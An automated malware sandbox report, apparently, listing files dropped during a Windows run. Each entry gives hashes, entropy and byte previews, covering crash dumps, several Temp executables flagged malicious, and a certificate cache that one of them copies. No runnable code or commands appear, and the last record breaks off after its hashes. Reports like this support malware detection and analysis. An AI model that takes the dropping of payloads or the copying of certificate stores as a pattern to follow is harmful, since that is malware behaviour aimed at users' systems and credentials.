SSDEEP:	3072:mVuiBQ4uEqJaNYcQjBYwaWl+P8y2ovLTgZXwW94dOze+w9WX:mbBQ4fCiP8y2gTgv9fXLX
MD5:	007D0974C0D2E21D57913AEACBAEA10C
SHA1:	D2FCF904CC198010758E36F9DAA963497A00DC7D
SHA-256:	C1B5DEC5DEDE43E9CB237DDC92F12FFFA09F4F7AAF01F78A3FE26F4A61628286
SHA-512:	31FB6D8AF07F4C2C817ABBBFC0359ED5D3DFEB1A05307D1D542A49F6C2FBA6D939E4C0F13AF953638CB3DC4DAA38452CEEA54DA882AA8707CDAC37FE270A237F
Malicious:	false
Preview:	MDMP..a..... .........e........................p...........$...h$.......1...N..........`.......8...........T...........X5...E...........$..........x&..............................................................................eJ.......'......GenuineIntel............T.............e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF27F.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Dec 22 20:12:34 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	70340
Entropy (8bit):	1.7962275574606372
Encrypted:	false
SSDEEP:	192:IJppHEEh+9ap2F9OaJ7F5iJ8C3e2foVNoFYsxwCvBX+TiJG4ltmMVDPamFXXUo2e:Onzh+9dFwa5PiJ/p1xwoMuGZIkoB
MD5:	B91D489C5E92ADA2BFC5F29E61158C1F
SHA1:	C5044F0D3D4CE71F2C6EC9951287B0C51687868B
SHA-256:	C272AE69FB199BA1F92A10D222850D0401C70CDD6D3FAC2D7C6835B469EE1A69
SHA-512:	4580582E837383408FF2D0AC2DB890344C0BE3B0B139F7773B4715F7CE515D152942EC6AC5C2374EA36D8D5C78627B5663668BA9281AFDE7F0DCAB4686178813
Malicious:	false
Preview:	MDMP..a..... .........e............$...............8...........P...........01..........`.......8...........T.......................................................................................................................eJ......X.......GenuineIntel............T.............e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF35B.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8296
Entropy (8bit):	3.696277344678922
Encrypted:	false
SSDEEP:	192:R6l7wVeJtO6ZmT6Yd767gmfqxVprI89bsPsfCdEm:R6lXJU686Yh67gmfqxts0f2
MD5:	DE10317DA8CCF38F7F93316C8058B7B4
SHA1:	A72D0C232C26B36BD3308F3F4C0A2BA78309DC7C
SHA-256:	60ABD38AA7B4BC11AEE9F32EF2AAE8A4E9BD0B759E087B104CA81152763A06E5
SHA-512:	2BC7291902C5129345C63E4ABD9B240BDFAD1FDBE926E198F317FE116288662E36ADFD68E88F9DBCCDE538E3E533600A265AF6C3BC8D248D06491AA9A33C5BA5
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF38A.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4635
Entropy (8bit):	4.4589253149809664
Encrypted:	false
SSDEEP:	48:cvIwWl8zstJg77aI9rIWpW8VYcYm8M4JxJFCm+q8ys55mDIed:uIjfHI71h7VgJ/q5mDIed
MD5:	072A6315F5AB198F2AF6AECD13323F64
SHA1:	CEB29F351BB5F2CB743FA586CDE9B2B2A554F930
SHA-256:	4A03EA44682444C4B78E2209AADB88E28C83C2E8A10587EA006E87A5BFF6E72E
SHA-512:	4FFF22EE82A8CF9D168B10AF7A75D93E6C5EF5805FA483D6F5E01DA6F89DC6C2AF7D5F30BE7FEC474A5793F6B313360969095B94402BA59E47FED7227ABA32A0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="115875" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF39C.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	80666
Entropy (8bit):	3.083187313023881
Encrypted:	false
SSDEEP:	768:zssRmuragYuXdZyjpjDdl6i0LcQkRodsYWwUJ2LZ1EAEDLQIu1TW:JNXdZyjpiHkRwsYWww2LbE5e1TW
MD5:	99E4A94332EC1714C65CC7E0E43EE05E
SHA1:	659424D97BCAFD9CF66103DEF2E0B39B38330EC7
SHA-256:	F88EF3FD71DBBE88D02F6FC947B2F6C531214D5DD66BA693670F311E1EC488F5
SHA-512:	4829899EF57516A381175A86CF92226781113E442F3A389DA8F097B76ED70EFFF39D60BF351C178A0D612044A036C36C603EB305087D1D4FDD26866FC9522B13
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF3B8.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8314
Entropy (8bit):	3.6913541190930017
Encrypted:	false
SSDEEP:	192:R6l7wVeJtx6D6Y9lSUFogmfQJrJEvRApDH89bsasfpAMIEm:R6lXJr6D6Y/SUFogmfQJrJEvjs5fpAMq
MD5:	9E928FB5CECDAFFCF5745D7F0682389C
SHA1:	FD4048145AE49A432CFFD4E18BEF18233EB713D2
SHA-256:	1DB1D8D9920BD7FC4FE7C84C668D0901E06F0A12D870BBFDD930B47E80F3D5BC
SHA-512:	665A9150F365F9868A83E637B1A7852545983905342F744E3395BA09A69FF849EBD875A760CDBEF7B7A9F3E1A73BA638DFA9E1F9F90C3828D7E48C74C4F9DA38
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF3E8.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4656
Entropy (8bit):	4.459652742090167
Encrypted:	false
SSDEEP:	48:cvIwWl8zstJg77aI9rIWpW8VYPYm8M4JwMFo+q8vC5H8m0TZd:uIjfHI71h7VfJS75Ht0Vd
MD5:	24C2B54ACF132955E6F22801AF7667F5
SHA1:	9517D3435CB5723393547D0534C4CFC84808088B
SHA-256:	8B324EC5CD545046D6C7ECA71C8F4D1E142CCE83352ABCE2BD4BF1DFF62D13B9
SHA-512:	EFE0D1D1A1CA59C1EE137318318853AA8ED0C0502BE34FF790C234F3A2DA42FC985D7AE6CA8634A46186952783210C26540FE9991D6DA31ADA5A7412C1324B6E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="115875" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF3FB.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	80666
Entropy (8bit):	3.0831785041973454
Encrypted:	false
SSDEEP:	768:Vscqhu1agYuXdZyjpPDdl6i0LcPRodsYWwUJ2LZ1EAEDLQIrTS:FNXdZyjpmYRwsYWww2LbE5bTS
MD5:	BFBB835D80ACBC3A40E6280B0E81B2C0
SHA1:	2B8A46948F1A36B1B8D3E54F24276FD6E35C8806
SHA-256:	86E0C7D8A13F1AF03BC3F2467EF0E8C35F2AF71E4FB7B03F5241B9A7337CB93C
SHA-512:	4F1D4A3F5EE28356CC7AEBCD080C3E4E4CA536B520C78178792D90EFD78D91C10496DD526EEAFDDFC2999991E8DFAEF5295119658B69FFE466634B09CCF150B7
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF45A.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685355277047416
Encrypted:	false
SSDEEP:	96:TiZYWv2fuJZHYlYSW4nHcUYEZDyYltDiOId0pwo2vYaDXY2MggP1IB83:2ZDXyz4Yt2AaDXpMggPKB83
MD5:	A4D71C27BBF507351019A414FDF5FC02
SHA1:	42CB6BA111B11690755A182698FA53BEF277B2FE
SHA-256:	2D67638D0A2094B507F5628E51D8DB1AAE514C2789577F20DFDA917E9629998C
SHA-512:	FC5FB4A218015692FBC5F20A21C31D530701A65E44DEE978F3B53039B46C1607679333DB99FE2674E2AF0177F39FDC0E43B12E850872BE0AD0F02A6DF23C6E19
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF4E7.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685119435616152
Encrypted:	false
SSDEEP:	96:TiZYW47xftZEYRYNWJHcUYEZDYmtDiNIC0pw32PHxagXcMgOP3yIA83:2ZDN2zYD2/xagXcMgOPlA83
MD5:	99DDB899C5F62A9A6C658AE1D19880D9
SHA1:	2C3A661C531FF3F64208B81B8093779FDE07F544
SHA-256:	9562D376B44F4B82575CFD19900D6428BD85C30C8A27A8852D4A2C87EF2CFC88
SHA-512:	7DC049B89CB7939FAD136FD3A92491CEDA4453C3415796D914769CB0E0FFEF00D82893C04F8697CF677E7FEF1E8CCC159077EE06875CC9C26C1F5F07D85F1BF8
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	5.236946495216897
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
MD5:	5D20D9B3F928AC964E07C561FD8A3F42
SHA1:	B702BE149FCF94831A975F2CD06B2DFE020D9632
SHA-256:	59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
SHA-512:	30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
Malicious:	false
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2224
Entropy (8bit):	5.354902188542171
Encrypted:	false
SSDEEP:	48:CWSU4y4RQmFoUeWmfgZ9tK8NPdMs7u1iMugeC/ZaOUyu0lhV:CLHyIFKL3IZ2KlDOugg01
MD5:	F0A2951B4A2707FEA41442FACB995C9C
SHA1:	66F38C4D57B51434D429FF5ADCABD1901693522F
SHA-256:	29441A7E0E9FDFF83A18CD40A5ACF593A639D9523E0213FBD7792452ECC2AB04
SHA-512:	9E053A7200ADB17739B24FADD2165D119D50905DBFE05F931F6AF289B1954891137D3DB2496F42D74C601A1FD5E8588005B11267EBF8144C0209810D0E7F8B45
Malicious:	false
Preview:	@...e...........................................................P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\1DCB.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7599903
Entropy (8bit):	7.999465926518601
Encrypted:	true
SSDEEP:	196608:6//XRtjLxlOSUF369BJah6mdwNxiJ5t93b8+otpJCu1fQ4dD:6/njLxlOSq4BJdYw7yH9LICu1fNdD
MD5:	715ADBD8EC5CA2067CA7CC665E68E789
SHA1:	FB376EF6F27087E1AA5490A4B5FB9EC1B1E5CC98
SHA-256:	94B4CEBF5DC8B3253E88CB384F2DB5F7915DF536536EC2CDE6BB69208DB681C1
SHA-512:	3A5660E3B4D131E358F3CB6E994D3AA3D7460C9E3B62BACBE1D6AD02CA7067ED4A39495233E66CF9D0B1602B05924E087864DFCBE8AFBA0EC48CDDC26C0310AA
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....e.....................F......@.............@..........................@...................@..............................P........,..........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS.....L................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\2E76.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1089536
Entropy (8bit):	7.763348272913751
Encrypted:	false
SSDEEP:	24576:lolyrEZowUZcOoNY8CmUubodBJcQL/hujbp7Dov:lolviwUZraQL/i78v
MD5:	02C651EA5E55D7062602A6939C177FFF
SHA1:	E2A8BDA4E8C65422A89EDCE8680D9462500505C6
SHA-256:	75A3F650CFA0EF2A5449BB6B1D650D2268C6EEAD20293A82011270CA29B7F84B
SHA-512:	D3808E7C127E44BB32419BAC4FE678A6959C21B29E4F6A63117B28782D0AB0ABFF759BE35FAA7195E4D9D7EB6498F279CB57262578A47359C2D469D88C8E4FF7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................C.......R.......D.P...............X.....M.......S.......V.....Rich............PE..L...Z..c.................2...........!.......P....@.................................P........................................z..P............................................................r.......r..@............P..(............................text....1.......2.................. ..`.rdata...7...P...8...6..............@..@.data....X.......$...n..............@....tls................................@....sugak..A...........................@....rsrc..............................@..@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4E3.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4479880
Entropy (8bit):	7.973615403017669
Encrypted:	false
SSDEEP:	98304:yMZnaxGTIHlnaErrC4euRkVNo/lCEUfvPoi/3X+PP3fhuoCZO1tZBj7yu:zaOIHl0HNK+Qi/n+Pffh/CQ1R/
MD5:	5DAC05753690AC45C4020CCE37B861FE
SHA1:	563F3F64ECC7406F039515A3B2A9817BC78BAC52
SHA-256:	F7D14FD61C99F47725033CFEF75DCE24F7B1CB46B22C7B97EF2F8911A4E27178
SHA-512:	7001722D3E7300F2AEE5787B96AB9593FA8F7BD90F7CEF26B548A3B1C22ACA4A242C4C8BD5452692F81F490F3FB4645422D4B4B9D0FE8D1B5A4778B2CDB820BA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................C.......R.......D.P...............X.....M.......S.......V.....Rich............PE..L....?.c..................A..........!........B...@..................................WD......................................*B.P.....B..............PD...............................................................B.(............................text...V.A.......A................. ..`.rdata...7....B..8....A.............@..@.data....h...@B..&....B.............@....pajasobA.....B......DB.............@....rsrc.....N...B......HB.............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4KPV6A~1\cached-certs (copy)

Process:	C:\Users\user\AppData\Local\Temp\CA65.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	20852
Entropy (8bit):	6.05147791645295
Encrypted:	false
SSDEEP:	384:y/40VVq1h8PXtyd24ZFtVf1hc1xb50IU4mV91h5/ea4igBVA1hrqFU4WGYgVVdzy:oJiO962M1uxb+3jnt2a9gBSy6ddgV/TC
MD5:	07157C66A5400CA4F9A4F2399D42D50D
SHA1:	B271B0CA066E5C9C5C1907C3719BE132F0E88E7F
SHA-256:	64E8908011E96E737B7BDCC78A09D5939D7300209DCD3F4E9CEC6F012D00541D
